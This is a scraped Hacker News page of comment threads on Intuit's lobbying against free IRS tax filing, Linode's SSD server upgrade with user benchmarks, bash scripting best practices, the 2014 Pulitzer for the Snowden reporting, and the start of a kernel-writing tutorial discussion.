So pathetic to have to even have to debate the benefit of IRS providing a website to file taxes. The free filing for income lower than $58K is a scam. If you have a 1099 for $1000 or capital gains of $500 you are out of luck, it is impossible to know what they will charge until after you enter the data. That's what this assholes call innovation. The only explanation is that Intuit is influencing members of congress with money, that's a crime. There is no possible argument to justify forcing 100 million people to waste time on something that should be trivial for most people.
14
sirdogealot 2 days ago 0 replies      
Recently sitting down and manually preparing my taxes for the 9th year in a row now... I am not surprised.

This type of tax-code-manipulation must certainly have been happening since the dawn of time. That, or it was written to confuse the public on purpose.

Finding, reading, learning and understanding the tax code is no mean feat for a layman that was told nothing of it in school (none of us Canadians were taught taxes in public school). And this is coming from a relatively smart person who willingly reads cryptography papers and learns new programming languages for fun.

How much more difficult does TurboTax propose that the IRS make filing? Should we get individually filed returns notarized by our deceased relatives as well?

It usually takes me about 12-24 straight hours of work, and this is for a simple sole-proprietorship that just tallies up income and deducts expenses.

I manage to get it done properly and on time every year, but realizing so many schortcuts along the way that "they" could be making for us yet fail to year after year... it's really quite infuriating.

That, and the fact that I have to do the work to figure out how much I owe them. :/

I am proud to have completed my taxes myself and will strongly urge everybody I know not to vote for TurboTax with their wallets and why.

15
todd8 1 day ago 1 reply      
The crazy complexity of the US tax system is worse than it appears. There is a non-linear increase in complexity as one goes up the income scale. Have a few investments? More complexity. Real estate investments? More complexity. Starting a company? Even more complexity. Reasonably diversified individuals that have perhaps sold a company or two can expect a rough time.

One reason the complex system is tolerated is that the people it really hurts are very few. A friend of mine has never been audited and does nothing shady but spends roughly $30,000 on tax accountants every year preparing his returns because they are so complex. Fortunately for the rest of us, we just have to waste an inordinate amount of time with Turbo Tax.

16
yxhuvud 1 day ago 0 replies      
Swedish procedure (unless you have slightly more complicated stuff like stock ownership):

Go to tax agency home page and login there.

Go to the form for normal taxes.

All values are prefilled. Check two boxes (if you want to register two very common deductions).

Save and back up one step.

Submit tax declaration by looking through all numbers again and clicking submit.

17
tn13 2 days ago 0 replies      
I filed my returns once with turbo tax since then I have been using that form as a reference to file my other returns myself!.
18
willtheperson 1 day ago 1 reply      
While doing my taxes I was wondering why there isn't a startup in this space.

Turbotax:- Has a terrible UX/UI- It has to update itself with a 100mb payload every time you open it from Jan 1 - Apr 15- Doesn't actually advise you how to plan for your taxes. It's reactive to what you did.- Uses shady pricing and lots of versions to get you to spend more instead of just being straightforward.- Works hard to make you dependent on them

When you hear about the rich only paying 10%, 15% or whatever low bracket; they did it by putting their money in the right places and sometimes investing or spending it at the right time.

Where is the startup that is basically my accountant without the cost? Can we really not programmatically understand tax code and financial strategy?

19
arebop 2 days ago 0 replies      
I've been wondering if there's a PAC I could contribute to that would offset my Intuit funding.
20
mleonhard 2 days ago 0 replies      
According to Intuit's 2013 Annual Report page 41 [1] , they had $1.5B in Consumer Tax product revenue, which is primarily derived from TurboTax Online. That is 35% of their $4.2B total revenue in 2013.

They're creating a lot of ill-will for 35% of their business.

[1] http://investors.intuit.com/files/Intuit%20FY13%20Form%2010-...

21
nness 1 day ago 0 replies      
As an interesting aside, Australia's taxation department, the Australian Taxation Office, provides a completely free piece of software each year called e-tax (http://www.ato.gov.au/Individuals/Lodging-your-tax-return/E-...).

It walks you through filling out your tax lodgement step-by-step and even calculates your expected return. It's not the nicest piece of software, but after having read this article, I am greatly appreciative that it exists at all.

22
ecolner 1 day ago 0 replies      
* Not trying to piss off PG. I honestly don't know the rules about gathering supporters on HN, but this is in the spirit of the community I hope *

If anybody would like to use their skills to fix this issue with me (ex Intuit TurboTax engineer) please hop over to this Ask HN and send me a message (email on thread). Also check the website for a bit more context: http://taxcompactor.com

It's a pretty big project, but it's very doable by a small team from this community. Tax preparation is fundamentally a software engineering problem, which is convenient.

Need everything from testing to project management with myself floating between roles. Remote is welcome - I'm in California. We'll use Basecamp, Github, Jira, Skype? to work - productivity suggestions welcome of course. True collaboration and fair equity.

https://news.ycombinator.com/item?id=7599443

There are a few really great folks that have already reached out. Email me for details and we'll go from there. I'd love to hear from you.

23
wiradikusuma 1 day ago 1 reply      
While we're on this topic, if you're a US citizen and you have a company, I would like to ask:

1. If I incorporated a C-Corp on June 2013, and I told my lawyer I want my fiscal year to end by March 31, when is the deadline to file the tax? Is it still April 15? (I hope not, I haven't filed)

2. Is there any free tax filing solution for business? Considering my company has zero revenue (it doesn't even run, but that's another story).

FYI, I'm not a US citizen.

24
zobzu 1 day ago 1 reply      
in my experience...

in germany filling taxes took me about 5min.. that really because you need to go get a paper and give it to your company. Its otherwise more like 0 minutes since theres barely anything to do (which is.. logical, as its pointed out, they already have the data).

in the US, after hours and hours of reading and trying to do it myself, its still hell. using turbotax means its going to take 30min instead of a month; all that for "$30 a year" or close to that.

That's certainly fucked up.

25
grandinj 1 day ago 0 replies      
Even "third-world" countries like South Africa have e-filing for taxes....
26
gamed 1 day ago 0 replies      
This is a typical example of rent seeking behaviour. Companies spending money on lobbying without creating wealth. Unfortunately tax is one of the core functions of government and will always be vulnerable to this sort of manipulation of the political process.
27
nathan_f77 2 days ago 3 replies      
Just moved to the US last year, and used Turbo Tax to file my tax returns. It was alright, but in New Zealand, we don't generally have to jump through all these hoops.

I guess it would be nice if there were a free alternative to TurboTax, but at the same time, I kind of don't really care, so I'm happy to let them get away with whatever they're doing. I know Lobbying isn't illegal in the U.S., and I don't think it's all that immoral either.

28
001sky 2 days ago 2 replies      
Intuit has spent $11.5 million lobbying the federal government...

$10MM seems like a pittance. That's like what...2 minutes of superbowl ads? Can you really buy legislation for this cheap?

29
novalis78 1 day ago 0 replies      
Tax procedure on Mars: Go to your government's website and send them some Marscoin on the kickstarter project of the week or equivalent tipping addresses. Or have some AI distribute a percentage of your funds on your behalf based on some predefined rules.
30
thrillgore 1 day ago 0 replies      
Well color me shocked. A company using lobbying to protect its sources of revenue.
31
harywilke 1 day ago 0 replies      
i'm surprised how many people do not use accountants to prepare their taxes. i tried turbotax or one of it's ilk my first year out of college. it showed me owing 7k. after freaking out i got in contact w/ my brothers accountant. i ended up getting a refund of 700. it's not my job to know the ins and outs of the tax code or to keep up on what has changed since last years filings.hire an expert.
32
AznHisoka 1 day ago 1 reply      
More reason to hate Turbotax. Their commercials are ridiculous too - NO, doing my taxes is not a way to summarize y year achievements...idiots
33
mfisher87 1 day ago 0 replies      
I don't understand. I asked them specifically not to do this in my survey after completing my return.
34
sseveran 1 day ago 0 replies      
And anyone is surprised because...?
35
obeid 1 day ago 0 replies      
WHAT? a corporation that capitalized on the government's incompetence, is doing everything in their power to make sure things stay the same.

No come on you guys, April first was two weeks ago.

36
joshdance 1 day ago 0 replies      
As the witch from Princess Bride would say, "Booooooooo! BOOOOOOO!".
37
christemmer 2 days ago 1 reply      
How can lobbying such as this not be seen as corruption, but as a perfectly legal (but most importantly "right") thing to do?
38
whoismua 1 day ago 0 replies      
Before this is settled, the tax code should be made simpler with black or white options. A tax preparer saved me a few thousand dollars once by asking the right questions (school tuition). The same for my corp CPA.

The "free" tax return would serve who exactly? What if the government "forgot" to mention a few tax breaks? Maybe the government should offer free tax returns for the plain and simple ones or for those with very low incomes. Paying $50 to $100 to do your taxes when you pay, say $10K in taxes, isn't much.

US axes are very low compared to Sweden and most EU countries.

39
obeid 1 day ago 0 replies      
WHAT? a corporation that capitalized on the government's incompetence is doing everything in their power to make sure things stay the same.

No come on you guys, April first was two weeks ago.

40
snowwrestler 2 days ago 2 replies      
I question the idea that the government could build better tax prep software than Intuit or other private companies. I don't think the Feds are known these days for performant, efficient, easy-to-use large scale consumer web applications. At a minimum I think discussion along those lines should wait until federal IT procurement is reformed.

It's also worth noting that the article is not talking about the actual complexity of the tax code itself. As far as I know, Intuit is lobbying on the subject of tax preparation technologies, not lobbying against tax simplification in general. (As some comments seemed to imply.)

41
sunsu 2 days ago 1 reply      
If you were running Intiut, would you do anything differently? The TurboTax product is built on the fact that the Tax code is complicated. Of course they're going to lobby against tax reform.
42
webwielder 2 days ago 4 replies      
I used to boycott TurboTax because of this. But then I realized that Intuit is just playing the game. Why wouldn't they do everything they can to sustain their business (well, a sense of moral decency, I guess, but that's a big ask)?

The real root of the problem is of course our broken political process.

8
The New Linode Cloud: SSDs, Double RAM and much more linode.com
441 points by qmr  14 hours ago   222 comments top 48
1
madsushi 12 hours ago 4 replies      
Why do I pay Linode $20/month instead of paying DO $5/month(1)?

Because Linode treats their servers like kittens (upgrades, addons/options, support), and DO treats their servers like cattle. There's nothing wrong with the cattle model of managing servers. But I'm not using Chef or Puppet, I just have one server that I use to put stuff up on the internet and host a few services. And Linode treats that one solitary server better than any other VPS host in the world.

(1) I do have one DO box as a simple secondary DNS server, for provider redundancy

2
kyrra 13 hours ago 6 replies      
I forgot to benchmark the disk before I upgraded but here are some simple disk benchmarks on an upgraded linode (the $20 plan, now with SSD)

  $ dd bs=1M count=1024 if=/dev/zero of=test conv=fdatasync  1024+0 records in  1024+0 records out  1073741824 bytes (1.1 GB) copied, 1.31593 s, 816 MB/s  $ hdparm -tT /dev/xvda  /dev/xvda:   Timing cached reads:   19872 MB in  1.98 seconds = 10020.63 MB/sec   Timing buffered disk reads: 2558 MB in  3.00 seconds = 852.57 MB/sec
Upgraded cpuinfo model: Intel(R) Xeon(R) CPU E5-2680 v2 @ 2.80GHz

Old cpuinfo model: Intel(R) Xeon(R) CPU L5520 @ 2.27GHz

CPUs compared: http://ark.intel.com/compare/75277,40201

3
nivla 13 hours ago 3 replies      
Awesome News. Competition really pushes companies to please their customers. Ever since Digital Ocean became the new hip, Linode has been pushing harder. My experience with them has been mixed. Forgiving their previous mishaps and the feeling that the level of Customer Service has gone down, they have been decent year long. I wouldn't mind recommending them.

[Edit: Removed the bit about DigitalOcean Plans. If you have Ghostery running, it apparently takes out the html block listing different plans]

4
rjknight 13 hours ago 9 replies      
It looks like Linode are still leaving the "incredibly cheap tiny box" market to DO. Linode's cheapest option is $20/month, which makes it slightly less useful for the kind of "so cheap you don't even think about it" boxes that DO provide.
5
pavanky 11 hours ago 2 replies      
I wish Linode (or anyone else other than Amazon) provides a reasonable Plan[1] with GPUs on them.

[1]: Amazon charges $2 an hour thats about $1500 a month.

6
conorh 12 hours ago 2 replies      
Benchmarking using wrk the smallest linode (1024 now 2048) serving a page from an untuned Rails application using nginx/passenger getting almost no other traffic. Hard to compare of course given the various other factors, but produced slightly lower performance after the upgrade. Serving a page from nginx directly (no Rails) had no appreciable difference in performance, I guess the Rails web serving is more vCPU bound?

Before Upgrade:

  Running 30s test @ http://...    5 threads and 20 connections    Thread Stats   Avg      Stdev     Max   +/- Stdev      Latency   308.91ms  135.01ms 985.82ms   80.00%      Req/Sec    14.15      4.61    24.00     66.36%    2206 requests in 30.00s, 28.51MB read  Requests/sec:     73.53  Transfer/sec:      0.95MB
After Upgrade:

  Running 30s test @ http://..    5 threads and 20 connections    Thread Stats   Avg      Stdev     Max   +/- Stdev      Latency   321.74ms  102.45ms 957.74ms   87.32%      Req/Sec    12.02      2.18    17.00     80.75%    1858 requests in 30.01s, 24.03MB read  Requests/sec:     61.92  Transfer/sec:    819.98KB

7
jebblue 34 minutes ago 0 replies      
I was looking into alternatives but now I'll stick with them, I can't find another cloud provider whose stuff works so well.

edit: I just finished the migration, my disk speed test is through the roof, free ram is phenomenal!

8
endijs 13 hours ago 3 replies      
Most interesting part in this great upgrade is that they went from 8CPU setup to 2CPU setup.But yeah - 2x more RAM, SSDs will guarantee that I'm not going to switch anytime soon. Sadly I need to wait a week until this will be available in London.
9
raverbashing 13 hours ago 0 replies      
Congratulation on Linode

I stopped being a customer since migrating to DO but my needs were really small

But I think their strategy of keeping the price and increasing capabilities are good. Between $5 and $20 is a "big" difference for one person (still, it's a day's lunch), for a company it's nothing.

However, I would definitely go to Linode for CPU/IO intensive tasks. Amazon sucks at these (more benchmarks between the providers are of course welcome)

10
SCdF 7 hours ago 1 reply      
> Linodes are now SSD. This is not a hybrid solution its fully native SSD servers using battery-backed hardware RAID. No spinning rust! And, no consumer SSDs either were using only reliable, insanely fast, datacenter-grade SSDs that wont slow down over time. These suckers are not cheap.

http://techreport.com/review/26058/the-ssd-endurance-experim...

Not to slam what Linode is doing here, and I'm sure there are probably lots of great reasons to buy datacentre-grade SSDs, but just thought I'd point out that slowing down over time (or data integrity issues) are not really consumer-grade problems any more :-)

11
giulianob 14 hours ago 0 replies      
Holy crap this is awesome. Good job guys at Linode. I said I would switch if the prices dropped about 25% because RAM was pricey.... So now I have to switch.
12
relaxatorium 13 hours ago 2 replies      
This seems pretty fantastic, I am excited to upgrade and think the SSD storage is going to be really helpful for improving the performance of my applications hosted there.

That said, I am not an expert on CPU virtualization but I did notice that the new plans are differently phrased than the old ones here. The old plans all talked about 8 CPU cores with various 1x, 2x priority levels (https://blog.linode.com/2013/04/09/linode-nextgen-ram-upgrad... for examples), while the new plans all talk about 1, 2, etc. core counts.

Could anyone with more expertise here tell me whether this is a sneaky reduction in CPU power for the lower tiered plans, or just a simpler way of saying the same thing as the old plans?

13
__xtrimsky 9 hours ago 3 replies      
I still prefer OVH.comhttp://www.ovh.com/us/vps/vps-classic.xml

for $7 you get:2 cores2GB RAM

for 10$ you get:3 cores4GB RAM

They don't have SSD, but SSD doesn't do everything, I prefer more ram.

EDIT: If some of you don't know OVH, it's because its new in America, but its not some cheap company, it's a European company that is very successful there. And just recently created a datacenter in North America. (I used to live in France, and have known them for some years).

14
harrystone 11 hours ago 0 replies      
I would love to see them still keep all those old disks and sell me some huge, cheap, and slow storage on them.
15
munger 12 hours ago 1 reply      
Rackspace cloud customer here These Linode upgrades are very tempting to entice me to switch.

I get I might not be their target market (small business with about $1000/month on IaaS spending) but there are a couple things preventing me from doing so:1) $10/month size suitable for a dev instance.2) Some kind of scalable file storage solution with CDN integration like RS CloudFiles/Akamai or AWS S3/Cloudfront or block storage to attach to an individual server.

I guess you get what you pay for infrastructure components and flexibility AWS > RS > Linode > DO which roughly matches the price point.

16
ihowlatthemoon 11 hours ago 1 reply      
VPSBench result:

Before

-------

  CPU model:  Intel(R) Xeon(R) CPU           L5520  @ 2.27GHz  Number of cores: 8  CPU frequency:  2266.788 MHz  Total amount of RAM: 988 MB  Total amount of swap: 255 MB  System uptime:   8 days, 12:03,  I/O speed:  69.9 MB/s  Bzip 25MB: 8.96s  Download 100MB file: 47.2MB/s
After

------

  CPU model:  Intel(R) Xeon(R) CPU E5-2680 v2 @ 2.80GHz  Number of cores: 2  CPU frequency:  2800.086 MHz  Total amount of RAM: 1993 MB  Total amount of swap: 255 MB  System uptime:   2 min,  I/O speed:  638 MB/s  Bzip 25MB: 5.10s  Download 100MB file: 146MB/s
Test: https://github.com/mgutz/vpsbench

17
orthecreedence 12 hours ago 2 replies      
Bummer, they're taking away 8 cores for the cheap plans and replacing it with 2. Does anyone know if the new processors will offset this difference? I don't know the specs of the processors.

Linode's announcements usually come in triples...I'm excited for number three. Let's hope its some kind of cheap storage service.

18
rdl 9 hours ago 0 replies      
Semi-related: does anyone know of any good (but still fairly cheap) providers doing Atom C2750/C2758 servers yet?
19
vidyesh 12 hours ago 1 reply      
So this makes Lindode practically on par with DO's $20 plan. Up till now $20 plan at DO was better now its just the choice of the brand.

But here is one thing that DO provides and I think Linode too should, you get the choice to spin up a $5 instance anytime in your account for any small project or a test instance which you cannot on Linode.

20
davexunit 13 hours ago 4 replies      
Cool news, but their website now has the same lame design as DigitalOcean. I liked the old site layout better.
21
mwexler 13 hours ago 1 reply      
There's similar and then there's alike. I guess it makes comparison easy, but imitation certainly must be the sincerest form of flattery:

Compare the look and feel of https://www.linode.com/pricing/ and https://www.digitalocean.com/pricing/

22
corford 7 hours ago 0 replies      
Big shame the new $20 plan now only offers 2 cores versus 8 with the current plan. For my workloads, I don't need 2GB RAM or SSD disks, I just need the cores :(
23
__xtrimsky 8 hours ago 0 replies      
Could someone please explain what improvements can we get from SSD for web applications ?

I know it would read files faster, but in most cases reading a couple of PHP files is not such a big improvement.

My guess would be maybe databases ? Read time improvement for MySQL ?

24
ausjke 9 hours ago 0 replies      
This is great indeed. I'm happy Linode did this.I ran below command 10 times and used the average below:

dd bs=1M count=1024 if=/dev/zero of=test conv=fdatasync

Linode:1073741824 bytes (1.1 GB) copied, 1.09063 s, 985 MB/sD.O:1073741824 bytes (1.1 GB) copied, 3.23998 s, 331 MB/s

dd if=/dev/zero of=test bs=512 count=1500 oflag=dsync

Linode:768000 bytes (768 kB) copied, 0.478633 s, 1.6 MB/sD.O:768000 bytes (768 kB) copied, 1.01716 s, 755 kB/s

25
funkyy 5 hours ago 0 replies      
I would love to see Linode going to large HDD drives option for storage as well. I am dying to find really inexpensive cloud provider with cheap data space (SATA is fine), reasonable bandwidth but low cpu and ram and Linode style support/caring. Give server with ~500 GB hard drive, 2 TB outgoing transfer, 1 core and 1 GB ram for ~$20-30 and I am all yours.
26
extesy 13 hours ago 2 replies      
So now they match DigitalOcean prices but offer slightly more SSD space for each plan. I wonder what DO answer to this would be. They haven't changed their pricing for quite a while.
27
filmgirlcw 10 hours ago 1 reply      
Shall we call this the DigialOcean effect?
28
jevinskie 13 hours ago 0 replies      
I resized a 1024 instance to 2048 last night and it looks like it is already running on the new processors (from /proc/cpuinfo): model name: Intel(R) Xeon(R) CPU E5-2680 v2 @ 2.80GHz

Should I upgrade? Do I want 2 x RAM for 1/2 vCPUs? =)

29
jrockway 10 hours ago 1 reply      
A nice reward for those of us who have been using Linode from before they even had x86_64 images.
30
bfrog 13 hours ago 3 replies      
I'm actually a little unhappy, it looks like they reduced the CPU count for my $20/mo instance. At this point there's basically no reason to stay with them now.
31
level09 12 hours ago 0 replies      
I would probably move back from Digital Ocean if they allow a 10$/mo plan.

I know that's not a big price difference, but some website really don't need a lot of resources. they work well on D.O's 5$ server, and I have really a lot of them.

32
h4pless 13 hours ago 2 replies      
I notice that Linode talked a good bit about their bandwidth and included outbound bandwidth in their pricing model which DO does not. I wonder if DO has a similar model or if transfer capacity the only thing you have control over.
33
kijin 3 hours ago 0 replies      
About a week ago, I wrote a comment in another Linode-related thread asking how the new usage patterns that hourly billing encourages might affect CPU contention. At the time, I received 11 upvotes but no replies. Apparently, quite a few people were interested in my question but had no useful conjectures to share.

https://news.ycombinator.com/item?id=7564764

Now it's obvious what Linode's answer to that question is: Lower "burstable" CPU for lower plans.

The $20 plan used to be able to burst to 8 cores for short periods, but now it only has access to 2 vcores. The "guaranteed" processing power is probably higher with the newer CPUs, but at the expense of short-term burst performance.

Another minor detail that I find interesting is that the transfer cap for the $20 plan has been increased to 3TB, whereas the $40 plan still gets 4TB. Apart from the transfer cap plateau-ing at the extreme high end, this is the first time that Linode has broken its 11-year-old policy of "pay X times as much money, get X times as much RAM/disk/transfer".

34
Kudos 8 hours ago 0 replies      
Ubuntu 14.04 LTS is now available on Linode too.
35
jaequery 13 hours ago 0 replies      
im really impressed by their new CPU specs. from experience those aren't cheap and it's possibly the fastest CPU out in the market. combined with the SSDs, it may be that Linode currently is the fastest of any cloud hosting right now.
36
shiloa 10 hours ago 1 reply      
I have mixed feelings about this. We're in the process of moving from Linode to Rackspace but haven't flicked the switch just yet - was planning to this weekend.

Our Linode server (16 GB plan) has been performing terrible lately wrt I/O (compared to, say, a Macbook Pro running the same computations), and we decided we've had enough. I guess we'll have to compare the two after the upgrade and decide.

37
jaequery 13 hours ago 1 reply      
DO's biggest problem is their lack of "zero-downtime snapshot backup and upgrading". i've not used Linode but anyone know if theirs is any different?
38
nilved 8 hours ago 2 replies      
Linode's recent upgrades are awesome, but people are very quick to forget the period where they were being hacked left and right and didn't communicate with their customers until a defensive blog post weeks after the fact. No matter how good the servers may be, Linode should be a non-starter for anybody who cares about the security of their droplet; and, if you don't, why would you pay Linode's premium fee?
39
beedogs 10 hours ago 0 replies      
This is nice to see. SSD has gotten ridiculously cheap lately.
40
Justen 13 hours ago 1 reply      
Higher specs sound really nice, but on HN I see people commenting on the ease of DO's admin tools. How does Linode's compare?
41
jdprgm 9 hours ago 0 replies      
This is really a fantastic upgrade. I've been hosting with Linode for a few months now and been very happy with them. I run a relatively transfer intense SaaS app and a 50% transfer increase makes quite an improvement.
42
ff_ 12 hours ago 0 replies      
Wow, that's beautiful. Currently I'm a DO customer (10$ plan), and if they had a 10$ plan I'd make the switch instantly.
43
dharma1 12 hours ago 0 replies      
ohhh yesss. DO is good for some locations like Southeast Asia but loving this upgrade for my London and Tokyo Linodes
44
hyptos 10 hours ago 1 reply      
wow EC2 instance free plan :

$ dd bs=1M count=1024 if=/dev/zero of=test conv=fdatasync

1024+0 records in

1024+0 records out

1073741824 bytes (1.1 GB) copied, 35.8268 s, 30.0 MB/s

45
kolev 6 hours ago 1 reply      
Goodbye, Digital Ocean!
46
notastartup 12 hours ago 1 reply      
These upgrades are impressive but they are a bit too late to the game. DO still has these advantages besides the cheap monthly price:

- DO has excellent and easy to understand API- Step by step guides on setting up and running anything- Minimal and simple

To entice me, it's no longer just a matter of price, DO has extra value added, largely due to their simplicity.

47
zak_mc_kracken 13 hours ago 1 reply      
Does any of LINode or DigitalOcean offer plans without any SSD? I couldn't find any.

I just want to install some personal projects there for which even SSD's are overkill...

48
izietto 13 hours ago 0 replies      
Do you know cheaper alternatives? Like DigitalOcean, as @catinsocks suggests
9
Better bash in 15 minutes robertmuth.blogspot.com
436 points by wsxiaoys  2 days ago   147 comments top 21
1
phaemon 1 day ago 0 replies      
If you're using:

    set -o errexit # or set -e if you prefer
Then you probably also want:

    set -o pipefail
Otherwise, it only checks that the last command succeeds, so something like:

    ls *.ssjkfle | wc -l
will actually continue as success despite the "ls" failing.

2
rshm 1 day ago 2 replies      
'set -o nounset' is a must have. I Just suffered this script from Samsung Printer setting Utility. sudo ./uninstall wiped the /opt

  DEST_PATH=/opt/$VENDOR/$DEST_DIRNAME  #remove destination  VERSION=`cat "$DEST_PATH/bin/.version"`  if rm -fr "$DEST_PATH"; then  echo "INFO: $APP_NAME (ver.$VERSION) has been uninstalled successfully."  ...

3
narsil 2 days ago 2 replies      
Another useful capability I use to do cleanup is `trap`.

    function cleanup {        ...    }    trap cleanup EXIT
See more here: http://linux.die.net/Bash-Beginners-Guide/sect_12_02.html

4
kirubakaran 1 day ago 3 replies      
Use:

  #!/usr/bin/env bash
Instead of:

  #!/bin/bash
This makes the script more portable as you don't rely on bash (or any executable) to be in /bin.

http://en.wikipedia.org/wiki/Shebang_(Unix)#Portability

5
ygra 1 day ago 0 replies      
I love the very last list Signs that you should not be using a bash script. That should be a required part of every language/tool introduction/tutorial.

So very often people lose track of when to use what tools. (Although admittedly, so very often people are forced into some tools by external constraints.)

6
oneandoneis2 1 day ago 1 reply      
A link on HN about improving bash and it wasn't instructions on how to install zsh. I'm pleasantly surprised :)
7
earless1 2 days ago 4 replies      
I'm glad this included the "Signs you should not be using a bash script" section. Bash is a very good solution for many cases, but it becomes downright unruly when dealing with a lot of string manipulation and more complex objects.
8
rtpg 1 day ago 3 replies      
are we going to get a better bash at one point? I've always felt like the only thing bash scripts are good at describing is I/O redirection. But conditionals, dealing with variables, pretty much everything else is frustrating and error-prone

I use fish as my main shell and its slightly better, but just testing things on variables can be a huge mess.

9
mateuszf 1 day ago 2 replies      
Nice here document feature I have found recently is heredoc with pipe, e.g.

  cat <<REQUEST_BODY |        {    "from" : 0,    "size" : 40  }  REQUEST_BODY  curl http://localhost -d @-
It allows to pass heredoc text to standard input of next command.

10
sleepydog 2 days ago 0 replies      
I found this web page, from the author of musl libc, very insightful:

http://www.etalabs.net/sh_tricks.html

Shell scripts are great, I use and write them every day (and quite advanced ones, too). But it's very hard to make a shell script robust.

Unfortunately it's hard to find a replacement that is stable and installed everywhere. Perl is pretty close. And python too, if you are careful about making your script compatible with all the different versions.

11
dingaling 1 day ago 1 reply      

  complete -r
disables Bash 'smart tab completion', which in theory is a great idea ( use tab to complete arguments or only list files applicable to the program ) but which never seems to work properly for me.

Disabling it saves a lot of frustrated tab-banging.

12
zx2c4 1 day ago 0 replies      
If you'd like to see a decently written piece of bash that incorporates many of these suggestions, check out pass, the standard unix password manager.

Project page: http://www.zx2c4.com/projects/password-store/Source: http://git.zx2c4.com/password-store/tree/src/password-store....

13
Karunamon 1 day ago 3 replies      
Try moving all bash code into functions leaving only global variable/constant definitions and a call to main at the top-level.

One of my main complaints with bash.. the file is evaluated in order - you can't call a function on the line before it's declared.

This fails:

    #!/usr/bin/env bash    bar='bar'    foofunction    foofunction(){      echo 'foo'      echo $bar    }
Basically you have to write your entire script in reverse, and i'm unaware of a good way to get around it.

14
hyp0 1 day ago 2 replies      
Excellent, bash the good parts. More than 15 minutes though.

Googling bashlint, shlint turns up some discussion (bash -n, ksh -n, zsh -n, some github projects), but I doubt they cover this article's specifics - though most (all?) of it could be automatically checked. I think some could be automatically added (e.g. set -o nounset) - perhaps a bash-subset (or coffeescript-style language) possible...

15
njharman 1 day ago 1 reply      
>> This will take care of two very common errors:>> Referencing undefined variables (which default to "") >> Ignoring failing commands

Better is subjective... About half my scripts depend on those features. For default arguments, and fail early.

16
cynik_ 1 day ago 1 reply      
I'd really recommend using `set -x` or `bash -x script` to sanity check all the commands and expected output.

See http://www.tldp.org/LDP/Bash-Beginners-Guide/html/sect_02_03...

17
voltagex_ 1 day ago 0 replies      
I also like http://google-styleguide.googlecode.com/svn/trunk/shell.xml but of course some things that work well for Google might not work for you.
18
knyt 1 day ago 0 replies      
The author uses ${} a lot more than I see in most code. Is it helpful to always use the ${var} syntax instead of simply writing $var?

I can see universal application of ${} being advantageous in avoiding accidental "$foo_bar where you meant ${foo}_bar" situations, and ${} makes it clearer that you're referencing a variable. The only cost would seem to be more typing.

19
dllthomas 1 day ago 0 replies      
One thing I've liked is throwing ${PIPESTATUS[*]} at the front of my PS1.
20
celebril 1 day ago 1 reply      
Or you can just use Zsh, which is superior in any way to Bash. ;)
21
dsfadadsffd 2 days ago 3 replies      
There is no need for long set flags, e.g. use

  set -e
and not:

  set -o err
etc.

10
The Guardian and Washington Post win the 2014 Pulitzer Prize for Public Service pulitzer.org
419 points by danso  3 days ago   41 comments top 9
1
etiam 3 days ago 1 reply      
In terms of importance, I think this was practically a given, but I've seen statements from people doubting if the Pulitzer Prize Board would have the courage to make a decision that still wouldn't sit well with certain powerful people.

Turns out they did. I'm very pleased to see that. Congratulations to the winners!

2
jwr 3 days ago 1 reply      
...while Edward Snowden, the source of all the information they published, is being hunted down and prosecuted.

Hmm.

3
danso 3 days ago 0 replies      
Journalism geekery: the "Public Service" award is often considered the best of the Pulitzers, partly because it is relatively equally distributed among smaller, lesser-known organizations as well as the big organizations...so it's sort of a implicit statement on how great journalism shouldn't be dependent on market size and staff resources.

So when a big organization like the Washington Post, and the Guardian US, win it, that's a strong statement. They could've just as likely been given the National or Investigative reporting awards.

(also, unlike the other prizes, there is no cash prize for the Public Service award)

The WaPo has won it before, including for Watergate and the Walter Reed investigation: http://www.pulitzer.org/bycat/Public-Service

4
hpriebe 3 days ago 1 reply      
Interesting to see that the runner up - Newsday - was selected for using digital tools to expose shootings, beatings and other concealed misconduct by some Long Island police officers. This highlights the increasingly complimentary role of digital tools and traditional reporting.

Anyone know what kind of digital tools they used?

Anyone know of other digital tools journalists/the press use to investigate/uncover content?

5
lawnchair_larry 3 days ago 1 reply      
So I guess Glenn Greenwald is officially a journalist.
6
spacefight 3 days ago 0 replies      
This is great news and well deserved. I hope that the price strongly motivates those in charge at either news company to press on with their coverage.
7
e15ctr0n 2 days ago 0 replies      
The full list of winners[0] and runners-up[1] is available on pulitzer.org.

[0] http://www.pulitzer.org/node/8501

[1] http://www.pulitzer.org/finalists/2014

8
subdane 3 days ago 0 replies      
The awards are for breaking the Snowden secret surveilance revelations.
9
dobbsbob 3 days ago 1 reply      
No love for Der Spiegel?
11
Kernel 101 Lets write a Kernel arjunsreedharan.org
394 points by slashdotaccount  3 days ago   99 comments top 21
1
deathanatos 3 days ago 1 reply      
I kinda wish some of the FS utilities were better. Despite FUSE, mounting a block device (like, disk image) as a non-root user is tough, so writing to an image with actual partitions/FS on it is difficult, especially to script, especially if you don't want to sudo in a build script. losetup on a disk image doesn't (to my knowledge) detect partitions for reasons unknown to me.

Bootsectors are similar. You can't just install grub to a disk image. (You have to losetup it, at the very least, which implies root. Why can't I just install to a file?)

You want a script/build system that allows you, at the very least, to:

1. Code.2. Run build system/script.3. Fire up qemu or similar.

You can't be rebooting. Ideally, it'd be great to do this in userspace.

That said, if you're starting out, just do [boot sector] + [kernel] = tada image until you need to do otherwise. (Really, do whatever works and is easy.)

That said, I've found a few somewhat helpful tools.

fuseloop[1] takes a file and offset/size, and exposes a single file. If you have a partitioned disk image, then you can feed it the partition offset, and it gives you back something you can format as an FS. (e.g., you can run ext2fs on.)

Then there's fuse.ext2[2], which mounts an ext2 FS on FUSE, so non-root usable again. Note that I'm linking to my fork of it, since the original didn't build for me, but I didn't write it. (Which I fixed, and sent a pull request, but never heard back.)

Finally and sorry to peddle my own stuff again I wrote a Python library for dealing with the MBR.[3] I use it to figure out offsets and sizes in a disk image.

I've had a bit of fun writing a boot loader, and I've managed to get it to load up its stage 2 and switch to 32-bit pmode. Had a fun error where a division instruction was throwing things into a triple fault; see [4] if you want to see how a division instruction can fail without dividing by zero (which was the first thing I checked). The disk layout is currently:

  [boot sector] [stage 2] [kernel] [ partitions, FS, real data, etc. ]
stage2's size is hard coded into the first sector of stage 2 (into itself), and the kernel's location and size will be similarly hard coded into it as well. (When I get there. Disks in pmode are different, as you can't just have the BIOS do all the work for you, sadly!) And by hard-coded, a build script calculates and just re-writes a few bytes.

[1]: https://github.com/jmattsson/fuseloop

[2]: https://github.com/thanatos/fuse-ext2-fakeFS

[3]: https://github.com/thanatos/pymbr

[4]: http://stackoverflow.com/questions/21212174/why-cant-i-step-...

2
exDM69 2 days ago 1 reply      
